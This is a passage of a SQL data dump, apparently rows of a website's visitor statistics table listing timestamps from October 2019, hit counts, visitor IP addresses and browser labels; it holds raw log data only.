,1,0,0,'66.249.64.253','chrome'),(456807,1571428660,1,1,0,0,'141.8.142.2','chrome'),(456808,1571428677,1,1,0,0,'87.250.224.90','chrome'),(456809,1571428715,1,1,0,0,'66.249.64.227','chrome'),(456810,1571429310,1,1,0,0,'157.55.39.197','other'),(456811,1571429738,1,1,0,0,'141.8.142.161','chrome'),(456812,1571430702,1,1,0,0,'13.66.139.0','other'),(456813,1571431054,2,1,1,0,'157.55.39.75',''),(456814,1571431235,1,1,0,0,'66.249.64.253','chrome'),(456815,1571431630,1,0,1,0,'207.46.13.162',''),(456816,1571431738,1,1,0,0,'66.249.64.227','chrome'),(456817,1571431777,1,1,0,0,'141.8.142.164','chrome'),(456818,1571432157,1,1,0,0,'66.249.64.253','chrome'),(456819,1571432559,1,0,1,0,'207.46.13.193',''),(456820,1571433125,1,1,0,0,'207.46.13.162','other'),(456821,1571433842,3,3,0,0,'66.249.64.253','chrome'),(456822,1571434118,1,1,0,0,'66.249.64.227','chrome'),(456823,1571434215,1,1,0,0,'66.249.64.226','chrome'),(456824,1571434471,2,2,0,0,'207.46.13.162','other'),(456825,1571435082,1,1,0,0,'37.9.113.163','chrome'),(456826,1571435487,2,2,0,0,'66.249.64.253','chrome'),(456827,1571435822,1,1,0,0,'66.249.64.227','chrome'),(456828,1571437019,1,1,0,0,'213.180.203.44','other'),(456829,1571437049,1,1,0,0,'141.8.142.161','chrome'),(456830,1571437243,1,1,0,0,'8.29.198.25','other'),(456831,1571437272,1,1,0,0,'178.154.200.33','other'),(456832,1571437425,1,1,0,0,'8.29.198.27','other'),(456833,1571437872,2,0,2,0,'157.55.39.198',''),(456834,1571438125,1,1,0,0,'213.180.203.44','chrome'),(456835,1571438129,1,1,0,0,'141.8.142.2','other'),(456836,1571438178,1,1,0,0,'213.180.203.37','chrome'),(456837,1571438199,1,1,0,0,'213.180.203.44','other'),(456838,1571438779,1,0,1,0,'66.249.64.94',''),(456839,1571439262,1,1,0,0,'213.180.203.44','chrome'),(456840,1571439556,1,1,0,0,'66.249.64.69','chrome'),(456841,1571440063,1,1,0,0,'157.55.39.75','other'),(456842,1571440119,3,1,2,0,'207.46.13.138',''),(456843,1571440295,1,1,0,0,'141.8.142.2','chrome'),(456844,1571440333,1,1,0,0,'178.154.200.33','chrome'),(456845,1571440428,1,1,0,0,'66.249.64.94','chrome'),(456846,1571441492,1,1,0,0,'66.249.64.66','chrome'),(456847,1571441562,1,1,0,0,'213.180.203.44','chrome'),(456848,1571441578,1,1,0,0,'141.8.142.2','chrome'),(456849,1571443005,1,1,0,0,'66.249.64.66','chrome'),(456850,1571443673,1,1,0,0,'66.249.64.69','chrome'),(456851,1571443753,2,0,2,0,'207.46.13.138',''),(456852,1571444646,1,1,0,0,'141.8.183.15','chrome'),(456853,1571444729,1,1,0,0,'213.180.203.37','chrome'),(456854,1571445138,1,1,0,0,'66.249.64.69','chrome'),(456855,1571445540,2,0,2,0,'207.46.13.138',''),(456856,1571445609,1,1,0,0,'207.46.13.162','other'),(456857,1571445758,1,1,0,0,'213.180.203.37','chrome'),(456858,1571447987,1,1,0,0,'178.154.200.33','other'),(456859,1571448015,1,1,0,0,'66.249.64.69','chrome'),(456860,1571448146,1,1,0,0,'8.29.198.25','other'),(456861,1571448303,1,1,0,0,'8.29.198.27','other'),(456862,1571448719,1,1,0,0,'207.46.13.138','other'),(456863,1571448985,2,0,2,0,'157.55.39.75',''),(456864,1571449605,1,1,0,0,'52.10.50.62','other'),(456865,1571449622,2,2,0,0,'157.55.39.75','other'),(456866,1571450556,1,1,0,0,'207.46.13.138','other'),(456867,1571450787,1,1,0,0,'66.249.64.18','chrome'),(456868,1571451137,1,1,0,0,'213.180.203.37','chrome'),(456869,1571453065,1,1,0,0,'207.46.13.243','other'),(456870,1571453523,1,1,0,0,'207.46.13.162','other'),(456871,1571454818,1,1,0,0,'141.8.132.37','chrome'),(456872,1571455097,1,1,0,0,'207.46.13.138','other'),(456873,1571455107,1,1,0,0,'207.46.13.243','other'),(456874,1571455858,1,1,0,0,'46.133.254.142','chrome'),(456875,1571455912,1,1,0,0,'13.66.139.0','other'),(456876,1571457871,1,1,0,0,'213.180.203.37','chrome'),(456877,1571459034,2,2,0,0,'8.29.198.26','other'),(456878,1571459664,1,1,0,0,'207.46.13.243','other'),(456879,1571460005,1,1,0,0,'213.180.203.37','chrome'),(456880,1571460055,2,2,0,0,'207.46.13.37','other'),(456881,1571460609,1,1,0,0,'91.196.178.136','firefox'),(456882,1571460936,1,1,0,0,'141.8.142.2','chrome'),(456883,1571461029,1,1,0,0,'87.250.224.90','chrome'),(456884,1571461121,1,1,0,0,'91.196.178.53','chrome'),(456885,1571461369,1,1,0,0,'157.55.39.75','other'),(456886,1571461471,2,2,0,0,'207.46.13.243','other'),(456887,1571461777,1,1,0,0,'207.46.13.138','other'),(456888,1571461780,1,1,0,0,'207.46.13.43','other'),(456889,1571462192,1,1,0,0,'46.211.233.168','chrome'),(456890,1571462503,1,1,0,0,'207.46.13.37','other'),(456891,1571464897,1,1,0,0,'66.249.64.94','chrome'),(456892,1571464917,1,1,0,0,'46.211.154.169','chrome'),(456893,1571465101,1,1,0,0,'207.46.13.138','other'),(456894,1571465320,1,1,0,0,'213.180.203.44','chrome'),(456895,1571466057,1,1,0,0,'193.106.30.99','firefox'),(456896,1571467033,1,1,0,0,'207.46.13.243','other'),(456897,1571467517,1,1,0,0,'207.46.13.43','other'),(456898,1571469173,1,1,0,0,'207.46.13.37','other'),(456899,1571469939,1,1,0,0,'8.29.198.25','other'),(456900,1571470084,1,1,0,0,'8.29.198.27','other'),(456901,1571470742,1,1,0,0,'46.48.13.161','chrome'),(456902,1571470787,1,1,0,0,'178.154.200.33','chrome'),(456903,1571471243,1,1,0,0,'207.46.13.243','other'),(456904,1571471952,2,2,0,0,'207.46.13.37','other'),(456905,1571472005,1,1,0,0,'87.250.224.90','chrome'),(456906,1571472480,1,1,0,0,'207.46.13.179','other'),(456907,1571473129,1,1,0,0,'141.8.142.2','chrome'),(456908,1571473423,1,1,0,0,'91.209.11.236','other'),(456909,1571474047,1,1,0,0,'213.180.203.37','other'),(456910,1571475145,1,1,0,0,'213.180.203.44','other'),(456911,1571475829,1,1,0,0,'207.46.13.37','other'),(456912,1571476185,1,1,0,0,'213.180.203.37','other'),(456913,1571476214,1,1,0,0,'95.108.213.55','chrome'),(456914,1571476441,1,1,0,0,'66.249.64.66','chrome'),(456915,1571476933,2,2,0,0,'207.46.13.37','other'),(456916,1571477093,1,1,0,0,'46.120.255.82','chrome'),(456917,1571477203,1,1,0,0,'213.180.203.44','chrome'),(456918,1571478220,1,1,0,0,'213.180.203.37','chrome'),(456919,1571478780,1,1,0,0,'109.74.154.72','chrome'),(456920,1571479993,2,1,1,0,'207.46.13.37',''),(456921,1571480776,1,1,0,0,'193.106.30.99','chrome'),(456922,1571480801,2,2,0,0,'8.29.198.25','other'),(456923,1571480942,1,0,1,0,'207.46.13.179',''),(456924,1571480956,1,1,0,0,'213.180.203.44','other'),(456925,1571482235,1,1,0,0,'91.196.178.136','chrome'),(456926,1571482423,1,0,1,0,'207.46.13.179',''),(456927,1571483554,1,0,1,0,'157.55.39.74',''),(456928,1571483575,1,1,0,0,'178.154.200.33','chrome'),(456929,1571484318,1,1,0,0,'192.162.134.6','chrome'),(456930,1571484586,1,0,1,0,'207.46.13.179',''),(456931,1571484808,1,1,0,0,'207.46.13.179','other'),(456932,1571485643,1,0,1,0,'157.55.39.74',''),(456933,1571486000,1,0,1,0,'157.55.39.246',''),(456934,1571486053,1,1,0,0,'66.249.64.66','chrome'),(456935,1571486988,1,1,0,0,'213.180.203.44','chrome'),(456936,1571487820,1,1,0,0,'66.249.64.66','chrome'),(456937,1571488084,1,1,0,0,'157.55.39.74','other'),(456938,1571488261,2,2,0,0,'207.46.13.149','other'),(456939,1571488497,1,1,0,0,'95.216.96.244','other'),(456940,1571488615,1,1,0,0,'157.55.39.246','other'),(456941,1571490767,1,1,0,0,'141.8.132.2','chrome'),(456942,1571491016,2,2,0,0,'157.55.39.246','other'),(456943,1571491136,1,1,0,0,'95.132.135.56','chrome'),(456944,1571491684,1,1,0,0,'8.29.198.25','other'),(456945,1571491711,1,1,0,0,'178.154.200.33','other'),(456946,1571491715,1,1,0,0,'87.250.224.90','chrome'),(456947,1571491720,1,1,0,0,'178.154.200.71','other'),(456948,1571491778,1,1,0,0,'95.108.181.104','other'),(456949,1571491854,1,1,0,0,'8.29.198.27','other'),(456950,1571492240,1,1,0,0,'207.46.13.179','other'),(456951,1571492407,1,1,0,0,'107.178.194.224','chrome'),(456952,1571492732,1,1,0,0,'213.180.203.37','other'),(456953,1571492740,1,1,0,0,'141.8.142.2','other'),(456954,1571493307,1,1,0,0,'207.46.13.179','other'),(456955,1571493833,1,1,0,0,'213.180.203.44','other'),(456956,1571494226,2,2,0,0,'157.55.39.246','other'),(456957,1571494357,1,1,0,0,'157.55.39.74','other'),(456958,1571494491,1,1,0,0,'207.46.13.179','other'),(456959,1571494691,2,2,0,0,'13.66.139.0','other'),(456960,1571494944,1,1,0,0,'213.180.203.37','chrome'),(456961,1571495801,1,1,0,0,'157.55.39.74','other'),(456962,1571495863,3,1,2,0,'157.55.39.246',''),(456963,1571496292,1,1,0,0,'207.46.13.230','other'),(456964,1571496304,1,1,0,0,'207.46.13.201','other'),(456965,1571496483,1,1,0,0,'213.180.203.37','other'),(456966,1571496547,1,1,0,0,'207.46.13.149','other'),(456967,1571496551,2,0,2,0,'207.46.13.179',''),(456968,1571497970,3,3,0,0,'35.193.23.1','chrome'),(456969,1571498068,3,3,0,0,'104.198.66.66','chrome'),(456970,1571498107,3,3,0,0,'35.202.190.25','chrome'),(456971,1571498120,5,5,0,0,'34.66.111.227','chrome'),(456972,1571498139,2,2,0,0,'35.239.3.238','chrome'),(456974,1571498341,1,1,0,0,'157.55.39.246','other'),(456975,1571499381,1,1,0,0,'157.55.39.246','other'),(456976,1571499417,1,1,0,0,'213.180.203.37','chrome'),(456977,1571500311,4,0,4,0,'207.46.13.152',''),(456978,1571500446,1,1,0,0,'213.180.203.37','chrome'),(456979,1571501791,1,1,0,0,'157.55.39.246','other'),(456980,1571502573,1,1,0,0,'8.29.198.25','other'),(456981,1571502659,1,1,0,0,'46.211.129.48','other'),(456982,1571502746,1,1,0,0,'8.29.198.27','other'),(456983,1571503070,1,1,0,0,'66.249.64.66','chrome'),(456984,1571503860,1,1,0,0,'157.55.39.246','other'),(456985,1571505197,1,1,0,0,'157.55.39.74','other'),(456986,1571507252,2,0,2,0,'157.55.39.63',''),(456987,1571507433,2,0,2,0,'157.55.39.74',''),(456988,1571508656,1,1,0,0,'66.249.64.69','chrome'),(456989,1571508786,11,11,0,0,'66.249.64.94','chrome'),(456990,1571508793,2,1,1,0,'157.55.39.246',''),(456991,1571509114,1,1,0,0,'18.224.15.41','chrome'),(456992,1571509695,1,0,1,0,'157.55.39.246',''),(456993,1571510942,2,0,2,0,'157.55.39.74',''),(456994,1571511709,1,1,0,0,'157.55.39.74','other'),(456995,1571511728,1,1,0,0,'157.55.39.246','other'),(456996,1571512905,2,0,2,0,'157.55.39.246',''),(456997,1571513314,1,1,0,0,'213.180.203.44','other'),(456998,1571513370,1,1,0,0,'141.8.142.2','other'),(456999,1571513453,1,1,0,0,'8.29.198.25','other'),(457000,1571513472,1,1,0,0,'46.98.202.97','chrome'),(457001,1571513586,10,10,0,0,'77.120.98.235','other'),(457002,1571513633,1,1,0,0,'8.29.198.27','other'),(457003,1571513674,2,2,0,0,'157.55.39.246','other'),(457004,1571514109,1,1,0,0,'200.89.178.2','msie'),(457005,1571514261,2,0,2,0,'207.46.13.150',''),(457006,1571514493,1,1,0,0,'207.46.13.229','other'),(457007,1571516411,1,1,0,0,'13.66.139.0','other'),(457008,1571516448,1,1,0,0,'173.252.127.16','other'),(457009,1571516449,1,1,0,0,'173.252.127.38','other'),(457012,1571516638,1,1,0,0,'87.250.224.90','other'),(457013,1571517090,2,0,2,0,'157.55.39.190',''),(457014,1571517778,1,1,0,0,'141.8.142.50','other'),(457015,1571518039,4,4,0,0,'91.209.11.236','other'),(457016,1571518173,1,1,0,0,'66.102.9.191','chrome'),(457017,1571518525,2,0,2,0,'157.55.39.161',''),(457018,1571519327,3,1,2,0,'157.55.39.237',''),(457019,1571519428,1,1,0,0,'91.209.11.236','other'),(457020,1571520131,2,2,0,0,'213.180.203.44','other'),(457021,1571520298,2,0,2,0,'157.55.39.161',''),(457022,1571520360,2,2,0,0,'157.55.39.190','other'),(457023,1571520817,2,2,0,0,'91.209.11.236','other'),(457024,1571521751,1,1,0,0,'213.180.203.44','other'),(457025,1571521824,1,1,0,0,'66.249.64.94','chrome'),(457026,1571521924,1,1,0,0,'91.209.11.236','other'),(457027,1571521943,2,0,2,0,'157.55.39.237',''),(457028,1571524009,3,1,2,0,'157.55.39.190',''),(457029,1571524328,1,1,0,0,'8.29.198.25','other'),(457030,1571524423,2,0,2,0,'157.55.39.161',''),(457031,1571524509,1,1,0,0,'8.29.198.27','other'),(457032,1571524645,1,1,0,0,'213.180.203.37','other'),(457033,1571525251,2,2,0,0,'207.46.13.150','other'),(457034,1571525969,1,1,0,0,'178.154.200.33','other'),(457035,1571526226,1,1,0,0,'157.55.39.237','other'),(457036,1571526776,1,0,1,0,'66.249.64.94',''),(457037,1571526778,1,0,1,0,'66.249.64.66',''),(457038,1571526828,1,1,0,0,'157.55.39.190','other'),(457039,1571527927,1,1,0,0,'157.55.39.190','other'),(457040,1571528109,2,2,0,0,'157.55.39.161','other'),(457041,1571528724,1,1,0,0,'141.8.142.2','other'),(457042,1571528951,2,0,2,0,'207.46.13.150',''),(457043,1571530250,2,0,2,0,'157.55.39.237',''),(457044,1571530251,1,1,0,0,'207.46.13.150','other'),(457045,1571530285,6,6,0,0,'60.191.38.77','firefox'),(457046,1571530835,1,1,0,0,'157.55.39.190','other'),(457047,1571531240,1,1,0,0,'157.55.39.237','other'),(457048,1571531250,3,0,3,0,'207.46.13.150',''),(457049,1571531938,1,1,0,0,'157.55.39.161','other'),(457050,1571532180,1,0,1,0,'207.46.13.150',''),(457051,1571532415,1,1,0,0,'141.8.142.164','other'),(457052,1571533229,2,0,2,0,'207.46.13.150',''),(457053,1571533532,1,1,0,0,'178.154.200.33','other'),(457054,1571533536,1,1,0,0,'141.8.188.12','other'),(457055,1571534692,1,1,0,0,'213.180.203.44','other'),(457056,1571535199,2,2,0,0,'8.29.198.25','other'),(457057,1571536193,1,1,0,0,'213.180.203.44','other'),(457058,1571536259,1,1,0,0,'207.46.13.166','other'),(457059,1571536685,2,2,0,0,'157.55.39.188','other'),(457060,1571536994,1,1,0,0,'207.46.13.150','other'),(457061,1571538057,1,1,0,0,'207.46.13.166','other'),(457062,1571538875,1,1,0,0,'46.98.76.125','chrome'),(457063,1571539325,1,1,0,0,'207.46.13.166','other'),(457064,1571539489,1,1,0,0,'37.9.113.10','other'),(457065,1571539503,1,1,0,0,'178.154.200.33','other'),(457066,1571539839,2,2,0,0,'213.180.203.44','other'),(457067,1571540967,1,1,0,0,'128.71.69.91','chrome'),(457068,1571541066,1,1,0,0,'207.46.13.166','other'),(457069,1571541927,1,1,0,0,'213.180.203.37','other'),(457070,1571542920,1,1,0,0,'66.249.64.94','chrome'),(457071,1571544339,1,1,0,0,'66.249.64.94','chrome'),(457072,1571546076,1,1,0,0,'8.29.198.26','other'),(457073,1571546267,1,1,0,0,'8.29.198.25','other'),(457074,1571546277,1,1,0,0,'213.180.203.44','other'),(457075,1571547292,1,1,0,0,'213.180.203.37','other'),(457076,1571547411,2,0,2,0,'157.55.39.208',''),(457077,1571548558,1,1,0,0,'141.8.142.2','other'),(457078,1571548724,2,0,2,0,'157.55.39.208',''),(457079,1571550557,1,1,0,0,'66.249.64.69','chrome'),(457080,1571550769,1,1,0,0,'213.180.203.44','other'),(457081,1571550894,2,0,2,0,'207.46.13.166',''),(457082,1571552053,1,1,0,0,'109.173.85.172','msie'),(457083,1571552894,1,1,0,0,'157.55.39.208','other'),(457084,1571553709,1,1,0,0,'207.46.13.251','other'),(457085,1571554255,3,1,2,0,'207.46.13.247',''),(457086,1571555835,1,1,0,0,'134.249.201.82','chrome'),(457087,1571556942,2,2,0,0,'8.29.198.26','other'),(457088,1571557612,1,1,0,0,'157.55.39.208','other'),(457089,1571559016,1,1,0,0,'207.46.13.166','other'),(457090,1571562088,1,1,0,0,'82.145.210.139','other'),(457091,1571563186,1,1,0,0,'213.180.203.44','other'),(457092,1571564291,1,1,0,0,'141.8.142.2','other'),(457093,1571566798,1,1,0,0,'87.250.224.90','other'),(457094,1571567349,1,1,0,0,'106.120.173.136','other'),(457095,1571567422,1,1,0,0,'185.154.72.12','other'),(457096,1571567448,1,1,0,0,'52.162.161.148','other'),(457097,1571567800,1,1,0,0,'8.29.198.25','other'),(457098,1571568004,1,1,0,0,'8.29.198.26','other'),(457099,1571568021,2,2,0,0,'46.120.255.82','chrome'),(457100,1571568073,1,1,0,0,'141.8.142.2','other'),(457101,1571568077,1,1,0,0,'213.180.203.37','other'),(457102,1571569234,1,1,0,0,'213.180.203.37','other'),(457103,1571572252,1,1,0,0,'109.74.154.72','chrome'),(457104,1571572412,1,1,0,0,'213.180.203.44','other'),(457105,1571572972,1,1,0,0,'213.180.203.37','other'),(457106,1571574348,1,1,0,0,'66.249.64.16','chrome'),(457107,1571575048,1,1,0,0,'141.8.188.25','other'),(457108,1571576436,1,1,0,0,'5.45.207.49','other'),(457109,1571576695,3,3,0,0,'66.249.64.66','chrome'),(457110,1571577097,1,0,1,0,'157.55.39.154',''),(457111,1571578150,1,1,0,0,'66.249.64.16','chrome'),(457112,1571578677,1,0,1,0,'157.55.39.154',''),(457114,1571578680,1,1,0,0,'8.29.198.27','other'),(457115,1571578859,1,1,0,0,'8.29.198.26','other'),(457116,1571579228,1,1,0,0,'207.46.13.50','other'),(457117,1571581866,1,1,0,0,'213.180.203.44','other'),(457118,1571585978,2,0,2,0,'207.46.13.50',''),(457119,1571586624,3,1,2,0,'207.46.13.50',''),(457120,1571586927,1,1,0,0,'213.180.203.44','other'),(457121,1571587246,1,1,0,0,'207.46.13.0','other'),(457122,1571588190,1,1,0,0,'66.249.64.69','chrome'),(457123,1571589283,2,0,2,0,'207.46.13.50',''),(457124,1571589533,1,1,0,0,'8.29.198.26','other'),(457125,1571589735,1,1,0,0,'8.29.198.27','other'),(457126,1571590709,1,1,0,0,'213.180.203.37','other'),(457127,1571590934,2,0,2,0,'157.55.39.8',''),(457128,1571591924,1,1,0,0,'213.180.203.44','other'),(457129,1571591948,1,0,1,0,'66.249.64.94',''),(457130,1571592826,1,1,0,0,'157.55.39.8','other'),(457131,1571593187,1,1,0,0,'141.8.132.19','other'),(457132,1571593205,1,1,0,0,'91.196.178.83','chrome'),(457133,1571594307,1,1,0,0,'66.249.64.66','chrome'),(457134,1571596636,2,0,2,0,'207.46.13.50',''),(457135,1571597578,1,1,0,0,'66.249.64.94','chrome'),(457136,1571597672,1,1,0,0,'207.46.13.50','other'),(457137,1571598016,1,1,0,0,'141.8.132.37','other'),(457138,1571598610,1,1,0,0,'207.46.13.50','other'),(457139,1571598881,2,0,2,0,'157.55.39.46',''),(457140,1571599310,1,1,0,0,'37.9.113.177','other'),(457141,1571599978,1,1,0,0,'157.55.39.8','other'),(457142,1571600245,1,1,0,0,'66.249.64.94','chrome'),(457143,1571600388,1,1,0,0,'8.29.198.27','other'),(457144,1571600600,1,1,0,0,'8.29.198.25','other'),(457145,1571601450,1,1,0,0,'87.250.224.90','other'),(457146,1571601849,1,1,0,0,'207.46.13.50','other'),(457147,1571602135,1,1,0,0,'213.180.203.44','other'),(457148,1571602292,1,1,0,0,'157.55.39.46','other'),(457149,1571602595,1,1,0,0,'13.66.139.0','other'),(457150,1571603355,1,1,0,0,'213.180.203.37','other'),(457151,1571603998,1,1,0,0,'13.66.139.0','other'),(457152,1571604424,1,1,0,0,'157.55.39.8','other'),(457153,1571605278,1,1,0,0,'66.249.64.69','chrome'),(457154,1571605776,1,1,0,0,'213.180.203.44','other'),(457155,1571607070,1,1,0,0,'178.154.200.60','other'),(457156,1571608088,2,0,2,0,'157.55.39.46',''),(457157,1571609339,1,1,0,0,'37.9.113.33','other'),(457158,1571609800,1,0,1,0,'207.46.13.179',''),(457159,1571610555,1,1,0,0,'141.8.183.33','other'),(457160,1571611231,1,1,0,0,'8.29.198.27','other'),(457161,1571611468,1,1,0,0,'8.29.198.25','other'),(457162,1571611789,2,0,2,0,'157.55.39.252',''),(457163,1571611842,1,1,0,0,'213.180.203.44','other'),(457164,1571611918,1,1,0,0,'213.180.203.37','other'),(457165,1571612849,2,2,0,0,'213.180.203.37','other'),(457166,1571613680,2,2,0,0,'213.180.203.44','other'),(457167,1571614791,1,1,0,0,'66.249.64.94','chrome'),(457168,1571614870,1,0,1,0,'157.55.39.8',''),(457169,1571616239,1,0,1,0,'157.55.39.8',''),(457170,1571616579,1,1,0,0,'157.55.39.119','other'),(457171,1571617843,1,0,1,0,'157.55.39.8',''),(457172,1571618400,1,1,0,0,'213.180.203.44','other'),(457173,1571618429,1,1,0,0,'213.180.203.37','other'),(457174,1571618534,2,2,0,0,'207.46.13.179','other'),(457175,1571618709,1,1,0,0,'157.55.39.252','other'),(457176,1571618983,1,1,0,0,'66.249.64.69','chrome'),(457177,1571619243,1,1,0,0,'66.249.64.66','chrome'),(457178,1571620121,1,1,0,0,'157.55.39.232','other'),(457179,1571620546,1,1,0,0,'185.154.72.12','other'),(457180,1571620709,1,1,0,0,'141.8.142.2','other'),(457181,1571620768,1,1,0,0,'213.180.203.44','other'),(457182,1571621099,1,1,0,0,'157.55.39.232','other'),(457183,1571621118,1,1,0,0,'157.55.39.252','other'),(457184,1571621384,1,1,0,0,'66.249.64.66','chrome'),(457185,1571622037,1,1,0,0,'66.249.64.94','chrome'),(457186,1571622078,2,2,0,0,'8.29.198.27','other'),(457187,1571625825,1,1,0,0,'213.180.203.44','other'),(457188,1571626925,1,1,0,0,'66.249.64.69','chrome'),(457189,1571627691,2,0,2,0,'207.46.13.179',''),(457190,1571628921,1,1,0,0,'66.249.64.69','chrome'),(457191,1571630804,1,1,0,0,'66.249.64.69','chrome'),(457192,1571630896,1,1,0,0,'66.249.64.94','chrome'),(457193,1571631274,1,1,0,0,'52.162.161.148','other'),(457194,1571632919,1,1,0,0,'8.29.198.26','other'),(457195,1571633194,1,1,0,0,'8.29.198.27','other'),(457196,1571634427,1,1,0,0,'213.180.203.44','other'),(457197,1571635126,1,1,0,0,'66.249.65.132','chrome'),(457198,1571635752,1,1,0,0,'91.196.178.72','chrome'),(457199,1571636885,1,1,0,0,'91.196.178.91','chrome'),(457200,1571637939,1,1,0,0,'213.180.203.37','other'),(457201,1571639387,1,1,0,0,'207.46.13.133','other'),(457202,1571640275,1,1,0,0,'213.180.203.44','other'),(457203,1571640833,1,1,0,0,'91.196.178.65','firefox'),(457204,1571641470,1,1,0,0,'195.114.146.243','chrome'),(457205,1571642179,1,1,0,0,'91.196.178.183','chrome'),(457206,1571642584,2,2,0,0,'91.196.179.33','chrome'),(457207,1571642674,1,1,0,0,'157.55.39.120','other'),(457208,1571642740,1,1,0,0,'213.180.203.37','other'),(457209,1571643772,1,1,0,0,'8.29.198.26','other'),(457210,1571643874,1,1,0,0,'91.196.178.183','chrome'),(457211,1571644047,1,1,0,0,'8.29.198.25','other'),(457212,1571644263,1,1,0,0,'46.42.133.171','msie'),(457213,1571644269,1,1,0,0,'46.188.33.126','msie'),(457214,1571645537,1,1,0,0,'91.196.178.65','firefox'),(457215,1571645798,1,1,0,0,'157.55.39.120','other'),(457216,1571645927,1,1,0,0,'207.46.13.122','other'),(457217,1571646420,1,1,0,0,'213.180.203.44','chrome'),(457218,1571646888,1,1,0,0,'91.196.178.73','chrome'),(457219,1571646935,1,1,0,0,'91.196.178.180','chrome'),(457220,1571647517,1,1,0,0,'213.180.203.44','other'),(457221,1571647668,1,1,0,0,'157.55.39.120','other'),(457222,1571647853,1,1,0,0,'91.196.177.46','firefox'),(457223,1571649120,2,2,0,0,'217.77.215.167','chrome'),(457224,1571650215,1,1,0,0,'193.93.217.75','chrome'),(457225,1571650245,1,1,0,0,'178.154.200.13','other'),(457226,1571650423,1,1,0,0,'141.8.188.12','other'),(457227,1571650515,1,1,0,0,'46.211.149.68','chrome'),(457228,1571650647,1,1,0,0,'91.196.178.72','chrome'),(457229,1571650904,2,2,0,0,'91.196.178.183','chrome'),(457230,1571651099,1,1,0,0,'207.46.13.133','other'),(457231,1571652253,1,1,0,0,'157.55.39.120','other'),(457232,1571653277,2,2,0,0,'60.191.38.77','firefox'),(457233,1571654369,1,1,0,0,'66.249.65.132','chrome'),(457234,1571654614,2,2,0,0,'8.29.198.25','other'),(457235,1571656185,2,0,2,0,'207.46.13.122',''),(457236,1571656758,2,0,2,0,'207.46.13.133',''),(457237,1571657019,1,1,0,0,'157.55.39.120','other'),(457238,1571657050,1,1,0,0,'141.8.142.115','other'),(457239,1571657093,1,1,0,0,'66.249.65.134','chrome'),(457240,1571657761,1,1,0,0,'207.46.13.133','other'),(457241,1571657834,1,1,0,0,'91.196.178.91','chrome'),(457242,1571658024,1,1,0,0,'91.196.178.71','chrome'),(457243,1571658294,1,1,0,0,'91.196.178.72','chrome'),(457244,1571658347,1,1,0,0,'91.196.178.88','firefox'),(457245,1571658788,1,1,0,0,'91.196.159.42','chrome'),(457246,1571659425,1,1,0,0,'34.217.35.90','other'),(457247,1571660212,1,1,0,0,'91.196.178.183','chrome'),(457248,1571660260,1,1,0,0,'91.196.178.71','firefox'),(457249,1571660882,1,1,0,0,'95.46.160.252','chrome'),(457250,1571661107,1,1,0,0,'109.74.154.72','chrome'),(457251,1571661191,2,0,2,0,'157.55.39.120',''),(457252,1571661636,2,2,0,0,'157.55.39.120','other'),(457253,1571661679,3,3,0,0,'212.83.153.181','other'),(457254,1571663350,1,1,0,0,'213.180.203.44','other'),(457255,1571663624,1,1,0,0,'213.180.203.37','other'),(457256,1571664031,1,1,0,0,'194.0.157.153','chrome'),(457257,1571664524,1,1,0,0,'213.180.203.44','other'),(457258,1571664722,1,1,0,0,'93.74.255.66','chrome'),(457259,1571665350,1,1,0,0,'193.106.30.99','chrome'),(457260,1571665489,1,1,0,0,'8.29.198.25','other'),(457261,1571665823,1,1,0,0,'8.29.198.27','other'),(457262,1571665965,1,1,0,0,'213.180.203.44','other'),(457263,1571666607,1,1,0,0,'207.46.13.80','other'),(457264,1571666751,1,1,0,0,'91.196.178.180','chrome'),(457265,1571666908,1,1,0,0,'93.74.255.66','chrome'),(457266,1571667907,1,1,0,0,'207.46.13.80','other'),(457267,1571668785,1,1,0,0,'213.180.203.44','other'),(457268,1571669591,1,1,0,0,'66.102.9.161','chrome'),(457269,1571671222,1,1,0,0,'66.249.65.132','chrome'),(457270,1571671621,1,1,0,0,'213.180.203.37','other'),(457271,1571672684,1,1,0,0,'62.216.43.242','chrome'),(457272,1571672988,1,1,0,0,'91.196.178.133','chrome'),(457273,1571674108,2,0,2,0,'207.46.13.80',''),(457274,1571675162,1,1,0,0,'66.249.65.100','chrome'),(457275,1571676368,2,2,0,0,'8.29.198.25','other'),(457276,1571677620,1,1,0,0,'46.211.212.145','chrome'),(457277,1571678042,1,1,0,0,'207.46.13.80','other'),(457278,1571678100,1,1,0,0,'213.180.203.44','other'),(457279,1571680663,1,1,0,0,'41.231.5.36','chrome'),(457280,1571681515,2,2,0,0,'207.46.13.133','other'),(457281,1571682281,1,1,0,0,'178.212.194.112','chrome'),(457282,1571682544,1,1,0,0,'207.46.13.80','other'),(457283,1571685856,2,2,0,0,'207.46.13.80','other'),(457284,1571686586,1,1,0,0,'157.55.39.108','other'),(457285,1571687145,1,1,0,0,'66.249.65.132','chrome'),(457286,1571687226,1,1,0,0,'8.29.198.27','other'),(457287,1571687585,1,1,0,0,'8.29.198.25','other'),(457288,1571687939,2,0,2,0,'207.46.13.128',''),(457289,1571688711,2,2,0,0,'95.213.141.126','opera'),(457290,1571689337,1,1,0,0,'128.71.69.91','chrome'),(457291,1571689784,1,1,0,0,'95.108.181.104','other'),(457292,1571690094,1,1,0,0,'66.249.65.144','chrome'),(457293,1571690372,1,0,1,0,'207.46.13.243',''),(457294,1571691486,1,1,0,0,'141.8.132.2','other'),(457295,1571692576,1,1,0,0,'66.249.65.142','chrome'),(457296,1571692833,3,1,2,0,'207.46.13.233',''),(457297,1571694622,1,1,0,0,'209.17.96.210','other'),(457298,1571696436,1,1,0,0,'213.180.203.44','other'),(457299,1571696511,1,1,0,0,'141.8.142.2','other'),(457300,1571697908,1,1,0,0,'141.8.142.2','other'),(457301,1571698100,2,2,0,0,'8.29.198.25','other'),(457302,1571698925,1,1,0,0,'207.46.13.128','other'),(457303,1571700135,80,80,0,0,'185.154.72.12','other'),(457304,1571700321,1,1,0,0,'157.55.39.234','other'),(457305,1571702424,1,1,0,0,'213.180.203.44','other'),(457306,1571703790,1,1,0,0,'209.17.97.42','other'),(457307,1571704392,1,1,0,0,'213.159.213.137','chrome'),(457308,1571704894,1,1,0,0,'157.55.39.252','other'),(457309,1571705077,1,1,0,0,'213.180.203.37','other'),(457310,1571705080,1,1,0,0,'178.154.200.33','other'),(457311,1571706339,1,1,0,0,'213.180.203.44','other'),(457312,1571706549,1,1,0,0,'157.55.39.47','other'),(457313,1571707244,2,0,2,0,'207.46.13.80',''),(457314,1571708630,1,1,0,0,'34.210.139.73','other'),(457315,1571708842,1,0,1,0,'207.46.13.222',''),(457316,1571708965,1,1,0,0,'8.29.198.26','other'),(457317,1571709028,1,1,0,0,'213.180.203.37','other'),(457318,1571709141,1,1,0,0,'66.249.65.